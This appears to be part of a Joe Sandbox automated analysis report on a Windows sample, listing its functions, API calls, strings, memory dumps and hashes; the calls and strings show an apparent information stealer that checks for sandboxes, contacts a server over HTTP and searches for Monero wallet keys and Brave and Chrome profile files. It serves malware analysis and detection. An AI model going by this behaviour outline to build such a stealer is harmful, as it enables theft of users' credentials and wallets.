                              Function 00D347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: bbf36d8bff453a2f91040dc1741a91bc0b46df68abb75153e671e100c3e85662
                              • Instruction ID: e63994291cbe937ad78a9cde828228de7137ad8415b9571f68e01a47faf2b034
                              • Opcode Fuzzy Hash: bbf36d8bff453a2f91040dc1741a91bc0b46df68abb75153e671e100c3e85662
                              • Instruction Fuzzy Hash: 08213EB1D00209ABDF14DFA5EC46ADE7B75FB44320F108625F915A7291EB706A0ACB91
                              Function 00D451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                                • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                                • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                                • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                                • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                                • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                              • Instruction ID: 764bd7c76c9df298beea16992475230983d77ab0f1c116ae9595639995102b61
                              • Opcode Fuzzy Hash: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                              • Instruction Fuzzy Hash: E8110030954148ABEB14FF68DD92AED7338EF50300F404558F81A5B592EF70AB09CAB2
                              Function 00D31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                              • ExitProcess.KERNEL32 ref: 00D31143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                              • Instruction ID: 78bf702b8287c4b18e53dd94d146ac6fd80ad8351d97ec3d6e98eef1e5a61048
                              • Opcode Fuzzy Hash: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                              • Instruction Fuzzy Hash: 65E0E67494530CFBE7546BA09D0AB4D7678EB44B02F104054F70D761D0D6B52645A6AB
                              Function 00D310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                              • Instruction ID: 11e0e3d7fbcea94212452629efdedc49435f015b9b9677f19bfb505cff357a93
                              • Opcode Fuzzy Hash: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                              • Instruction Fuzzy Hash: 74F0E2B1641208BBEB189AA4AC49FAEB7E8E705B15F301448F504E7280D5719E40DAA1
                              Function 00D31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                                • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                                • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                                • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                                • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                                • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                              • ExitProcess.KERNEL32 ref: 00D311C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                              • Instruction ID: e3e843ae15def6141d413976fb969309e0f37740074ae3ff6a8edbdf569a14ff
                              • Opcode Fuzzy Hash: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                              • Instruction Fuzzy Hash: 48E012B591430653CB0477B0BC0BB2E329C9B54786F080824FA09D2102FA65E8419677

                              Non-executed Functions

                              Function 00D438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00D438CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D438E3
                              • lstrcat.KERNEL32(?,?), ref: 00D43935
                              • StrCmpCA.SHLWAPI(?,00D50F70), ref: 00D43947
                              • StrCmpCA.SHLWAPI(?,00D50F74), ref: 00D4395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43C67
                              • FindClose.KERNEL32(000000FF), ref: 00D43C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                              • Instruction ID: b81db80f167c0bea1ab0dd2317f57e6ad2de6fc1ea852b9853646a60d129e95e
                              • Opcode Fuzzy Hash: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                              • Instruction Fuzzy Hash: E6A110B1940218ABDB24EBA4DC85FEE7778FF88301F084588A54D96141EB759B89CF72
                              Function 00D3BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2B,00000000,?,?,?,00D513F4,00D50B2A), ref: 00D3BEF5
                              • StrCmpCA.SHLWAPI(?,00D513F8), ref: 00D3BF4D
                              • StrCmpCA.SHLWAPI(?,00D513FC), ref: 00D3BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C7BF
                              • FindClose.KERNEL32(000000FF), ref: 00D3C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                              • Instruction ID: 3c3fed2af970b7db027af52e9ecf5926c51ce0ea19e14420cf2d7dabdc253b56
                              • Opcode Fuzzy Hash: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                              • Instruction Fuzzy Hash: 91425272950108ABEB14FB74DD96EED737DEF84300F404558B90AA6191EF34AB49CBB2
                              Function 00D44910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00D4492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                              • StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                              • StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                              • FindClose.KERNEL32(000000FF), ref: 00D44B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                              • Instruction ID: f41693a96c25863472d8cda70152a35a312fb903aabd21f80330b76a99c55f56
                              • Opcode Fuzzy Hash: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                              • Instruction Fuzzy Hash: 3B6113B2500219ABCB24EBA0DC45FEE777CFB88701F044588A54D96141EA75DB89DFB2
                              Function 00D44570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                              • wsprintfA.USER32 ref: 00D445A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                              • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D445EB
                              • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4468B
                              • FindClose.KERNEL32(000000FF), ref: 00D446A0
                              • lstrcat.KERNEL32(?,008DE520), ref: 00D446C5
                              • lstrcat.KERNEL32(?,008DD318), ref: 00D446D8
                              • lstrlen.KERNEL32(?), ref: 00D446E5
                              • lstrlen.KERNEL32(?), ref: 00D446F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                              • Instruction ID: 5d0c93162240e45786f785c40a0b0f445cef3b4ead4e96500cf346ad269c0dc4
                              • Opcode Fuzzy Hash: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                              • Instruction Fuzzy Hash: 8B5121B654021CABCB24EB70DC89FED777CAB98701F404588B60D96190EB749AC59FB2
                              Function 00D43EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00D43EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D43EDA
                              • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D43F08
                              • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D43F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4406C
                              • FindClose.KERNEL32(000000FF), ref: 00D44081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
